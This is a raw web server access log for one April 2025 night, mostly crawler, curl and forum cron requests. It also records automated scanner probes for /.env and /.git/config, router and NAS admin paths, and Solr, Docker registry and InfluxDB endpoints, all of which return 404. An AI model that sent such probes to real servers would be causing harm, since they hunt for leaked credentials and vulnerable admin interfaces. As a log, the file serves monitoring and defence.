64.226.117.46 - - [04/Apr/2025:01:03:17 +0200] "GET / HTTP/1.0" 200 423 "-" "-"
64.226.117.46 - - [04/Apr/2025:01:03:17 +0200] "GET /evox/about HTTP/1.1" 404 355 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
64.226.117.46 - - [04/Apr/2025:01:03:17 +0200] "GET /HNAP1 HTTP/1.1" 404 350 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
64.226.117.46 - - [04/Apr/2025:01:03:17 +0200] "GET / HTTP/1.0" 200 423 "-" "-"
64.226.117.46 - - [04/Apr/2025:01:03:17 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
161.35.210.151 - - [04/Apr/2025:01:03:17 +0200] "GET /solr/admin/info/system HTTP/1.1" 404 367 "-" "Go-http-client/1.1"
165.232.78.237 - - [04/Apr/2025:01:03:17 +0200] "GET /v2/_catalog HTTP/1.1" 404 356 "-" "Go-http-client/1.1"
161.35.212.17 - - [04/Apr/2025:01:03:17 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 366 "-" "Go-http-client/1.1"
165.227.150.209 - - [04/Apr/2025:01:03:17 +0200] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 350 "-" "Go-http-client/1.1"
161.35.210.248 - - [04/Apr/2025:01:03:17 +0200] "\x16\x03\x01" 400 383 "-" "-"
161.35.210.151 - - [04/Apr/2025:01:03:17 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
161.35.210.151 - - [04/Apr/2025:01:03:17 +0200] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 361 "-" "Go-http-client/1.1"
161.35.210.248 - - [04/Apr/2025:01:03:17 +0200] "\x16\x03\x01" 400 383 "-" "-"
143.198.200.27 - - [04/Apr/2025:01:03:18 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Go-http-client/1.1"
151.106.162.202 - - [04/Apr/2025:01:04:13 +0200] "GET /cron.php?cron_type=tidy_cache&sid=97a8e3632af38d5bd32358126c9aea49 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.202 - - [04/Apr/2025:01:04:13 +0200] "GET /cron.php?cron_type=tidy_cache&sid=97a8e3632af38d5bd32358126c9aea49 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.202 - - [04/Apr/2025:01:04:16 +0200] "GET /cron.php?cron_type=tidy_cache&sid=97a8e3632af38d5bd32358126c9aea49 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.202 - - [04/Apr/2025:01:05:15 +0200] "GET /cron.php?cron_type=tidy_cache&sid=7e7f64520ef5d363fded677b745f02af HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.202 - - [04/Apr/2025:01:05:17 +0200] "GET /cron.php?cron_type=tidy_cache&sid=7e7f64520ef5d363fded677b745f02af HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.202 - - [04/Apr/2025:01:05:18 +0200] "GET /cron.php?cron_type=tidy_cache&sid=7e7f64520ef5d363fded677b745f02af HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.168.134 - - [04/Apr/2025:01:05:36 +0200] "GET /cron.php?cron_type=tidy_sessions&sid=5ac4e41b1ee1d1fbb4f2f82605d93912 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.168.134 - - [04/Apr/2025:01:05:36 +0200] "GET /cron.php?cron_type=tidy_sessions&sid=5ac4e41b1ee1d1fbb4f2f82605d93912 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.168.134 - - [04/Apr/2025:01:05:36 +0200] "GET /cron.php?cron_type=tidy_sessions&sid=5ac4e41b1ee1d1fbb4f2f82605d93912 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
174.80.220.195 - - [04/Apr/2025:01:07:41 +0200] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
156.59.198.135 - - [04/Apr/2025:01:10:36 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10744960.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
174.138.25.71 - - [04/Apr/2025:01:20:32 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 Keydrop"
174.138.25.71 - - [04/Apr/2025:01:20:32 +0200] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 Keydrop"
123.194.80.122 - - [04/Apr/2025:01:21:20 +0200] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
151.106.162.202 - - [04/Apr/2025:01:23:28 +0200] "GET /images/smilies/icon_e_sad.gif HTTP/1.1" 404 305 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.202 - - [04/Apr/2025:01:23:28 +0200] "GET /images/smilies/icon_e_sad.gif HTTP/1.1" 404 305 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.202 - - [04/Apr/2025:01:23:28 +0200] "GET /images/smilies/icon_e_sad.gif HTTP/1.1" 404 305 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
185.40.4.51 - - [04/Apr/2025:01:46:51 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
151.106.162.202 - - [04/Apr/2025:01:47:00 +0200] "GET /cron.php?cron_type=tidy_cache&sid=4ccfd3ccdb8615bdd6bb20dc7a4cac62 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.202 - - [04/Apr/2025:01:47:00 +0200] "GET /cron.php?cron_type=tidy_cache&sid=4ccfd3ccdb8615bdd6bb20dc7a4cac62 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.202 - - [04/Apr/2025:01:47:04 +0200] "GET /cron.php?cron_type=tidy_cache&sid=4ccfd3ccdb8615bdd6bb20dc7a4cac62 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.163.149 - - [04/Apr/2025:01:47:47 +0200] "GET /download/file.php?id=252&sid=1c34a344762052c442d08799cad37c2e HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.163.149 - - [04/Apr/2025:01:47:48 +0200] "GET /download/file.php?id=252&sid=1c34a344762052c442d08799cad37c2e HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
156.59.198.136 - - [04/Apr/2025:01:48:19 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10949093.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
154.81.156.35 - - [04/Apr/2025:01:48:26 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.148.10.174 - - [04/Apr/2025:01:48:59 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 Chrome/120.0.0.0"
151.106.162.8 - - [04/Apr/2025:01:53:29 +0200] "GET /cron.php?cron_type=tidy_cache&sid=f3258d5e452ea9bc0739ed79244f6ec8 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.8 - - [04/Apr/2025:01:53:29 +0200] "GET /cron.php?cron_type=tidy_cache&sid=f3258d5e452ea9bc0739ed79244f6ec8 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.8 - - [04/Apr/2025:01:53:29 +0200] "GET /cron.php?cron_type=tidy_cache&sid=f3258d5e452ea9bc0739ed79244f6ec8 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
91.202.4.43 - - [04/Apr/2025:01:54:58 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
125.229.29.53 - - [04/Apr/2025:01:56:06 +0200] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"